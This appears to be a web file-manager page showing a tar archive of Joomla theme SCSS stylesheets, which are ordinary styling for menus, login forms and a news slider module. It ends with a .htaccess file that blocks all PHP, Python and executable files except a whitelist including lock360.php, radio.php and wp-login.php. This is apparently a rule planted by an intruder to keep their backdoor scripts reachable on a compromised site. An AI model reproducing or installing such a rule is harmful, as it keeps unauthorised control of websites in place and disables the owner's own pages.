File manager - Edit - /home/verseaumee/empowernetkenyajuly2026/scss.tar
Back
sanctum-joomla/_core.scss 0000604 00000006046 15251752204 0011466 0 ustar 00 .btn-group > .btn + .dropdown-toggle { box-shadow: 1px 1px 1px rgba(0,0,0,0.1); } .btn-group.open .btn-primary.dropdown-toggle { background: darken($accent-color-1, 5%); color: $white; box-shadow: inset -1px -1px 1px rgba(0,0,0,0.15); } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { background-image: none; background-color: $accent-color-1; } .btn-link { color: $accent-color-1; } // Joomla Login Module #login-form { margin-bottom: 0; #form-login-remember { margin: 20px 0 10px; input { margin: 0 5px 0 0; } } ul.unstyled { margin: 20px 0 0; a { color: $base-title-color; &:hover { color: $accent-color-1; } i { margin-right: 7px; } } } } // Joomla Menu Module .nav { &.menu { margin: 0; li { margin-bottom: 6.5px; &:last-child { margin-bottom: 0; } a { color: $base-title-color; &:before { content:"\f105"; font-family: FontAwesome; margin-right: rem(10px); } &:hover { color: $accent-color-1; } } span { &:before { content:"\f105"; font-family: FontAwesome; margin-right: rem(10px); } } ul { margin-top: 6.5px; margin-bottom: 6.5px; } &.current { > a, > span { color: $accent-color-1; } } } } } // Bootstrap "well" styling .well { background: transparent; border: 1px solid $base-border-color; border-radius: 0; box-shadow: none; padding: 30px 30px 10px; } // Joomla Login Page .login { > form { fieldset { .control-group { .control-label { text-align: left; padding-top: 10px; } #remember { margin-top: 10px; @include breakpoint(mobile-only) { width: auto; } } input { @include breakpoint(mobile-only) { width: 100%; } } } } } } .logout { .controls { margin-left: 0; } } ul.nav-tabs.nav-stacked { > li { > a { border-radius: 0 !important; border: 1px solid $base-border-color; &:hover { border: 1px solid $base-border-color; } } } } // Joomla Registration Page .registration { #member-registration { margin-bottom: 0; legend + .control-group { margin-top: 0; } .control-group { .control-label { text-align: left; padding-top: 10px; } input { @include breakpoint(mobile-only) { width: 100%; } } } } } // Joomla Username Remind and Password Reset Pages .remind, .reset { #user-registration { margin-bottom: 0; fieldset { p { margin-top: 0; } } .control-group { .control-label { text-align: left; padding-top: 10px; } } } } // Joomla User Profile Page .profile { > ul.btn-toolbar { margin-top: 0; } #users-profile-core { margin-bottom: 20px; } fieldset { dl { dt { text-align: left; } } } } // Joomla User Edit Profile .profile-edit { #member-profile { margin-bottom: 0; .control-group { .control-label { text-align: left; padding-top: 10px; } .chzn-container { padding-top: 8px; } } } } sanctum-joomla/_nssp2.scss 0000604 00000007607 15251752204 0011607 0 ustar 00 .nssp2 { .ns2-title { margin: 0 0 10px; font-size: $fontsizes-body-font-size*1.15; font-weight: normal; a { color: $base-title-color; &:hover { color: $accent-color-1; } } } .ns2-introtext { margin: 0; } .ns2-social { span { margin-left: 0 !important; margin-right: 10px; } } .ns2-rating { margin-bottom: 10px; } .ns2-links { margin-top: 10px; font-size: $fontsizes-body-font-size*0.9; .ns2-created { margin-right: 15px; &:before { content: "\f017"; font-family: FontAwesome; margin-right: 2px; } } .ns2-author { margin-right: 15px; &:before { content: "\f007"; font-family: FontAwesome; margin-right: 2px; } } .ns2-category { margin-right: 15px; a { color: $base-text-color; &:before { content: "\f07c"; font-family: FontAwesome; margin-right: 2px; } &:hover { color: $accent-color-1; } } } .ns2-comments { margin: 0; margin-right: 15px; color: $base-text-color; background: none; padding: 0; font-size: inherit; &:before { content: "\f086"; font-family: FontAwesome; margin-right: 6px; } &:hover { color: $accent-color-1; } } .ns2-hits { margin-right: 15px; background: none; padding: 0; color: $base-text-color; font-size: inherit; &:before { content: "\f06e"; font-family: FontAwesome; margin-right: 6px; } } .ns2-readmore { margin: 0; margin-right: 15px; color: $base-text-color; span { background: none; padding: 0; font-size: inherit; } &:before { content: "\f0c1"; font-family: FontAwesome; margin-right: 6px; } &:hover { color: $accent-color-1; } } } .ns2-page-inner-custom { overflow: hidden; > div { margin-bottom: 30px; &:last-child { margin-bottom: 0; } } } .ns2-image-link { position: relative; &:hover { .ns2-image-overlay { opacity: 1; } } @include breakpoint(small-mobile-range) { margin-bottom: 15px; } } .ns2-image-overlay { background: rgba(0, 0, 0, 0.5); color: #ffffff; padding: 20px; position: absolute; top: 0; bottom: 0; left: 0; right: 0; opacity: 0; @include transition(opacity 0.3s); &:before { font-size: 25px; height: 25px; width: 25px; margin-left: -11px; margin-top: -17px; color: #ffffff; position: absolute; left: 50%; top: 50%; content: "\f0c1"; font-family: FontAwesome; } } // Pagination and arrows .ns2-wrap { position: relative; .ns2-art-controllers { position: absolute; top: -58px; right: 0; .ns2-art-prev, .ns2-links-prev, .ns2-art-play, .ns2-links-play, .ns2-art-pause, .ns2-links-pause, .ns2-art-next, .ns2-links-next, .ns2-art-pagination span, .ns2-links-pagination span { background: none; text-indent: 0; height: auto; width: auto; } .ns2-art-pagination, .ns2-links-pagination { span { color: $base-text-color; @include transition(color 0.2s); &:hover, &.active { color: lighten($base-text-color, 20%); } } } .ns2-art-prev, .ns2-links-prev, .ns2-art-next, .ns2-links-next { padding: 5px 10px; background: $accent-color-1; color: #ffffff; border-radius: 3px; font-size: 11px; margin-top: -4px; margin-right: 0; margin-left: 5px; @include transition(all 0.2s); i { vertical-align: middle; } &:hover { background: $base-title-color; } } } } } .footer { .nssp2 { .ns2-title { font-size: $fontsizes-body-font-size; margin: 0; } } .ns2-page-inner-custom { > div { margin: 0; border-bottom: 1px solid lighten($footer-background-color, 5%); &:last-child { border: none; .ns2-column { > div { padding-bottom: 0 !important; } } } } .ns2-first { .ns2-column { > div { padding-top: 0 !important; } } } } } sanctum-joomla/.htaccess 0000644 00000000644 15251752204 0011302 0 ustar 00 <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>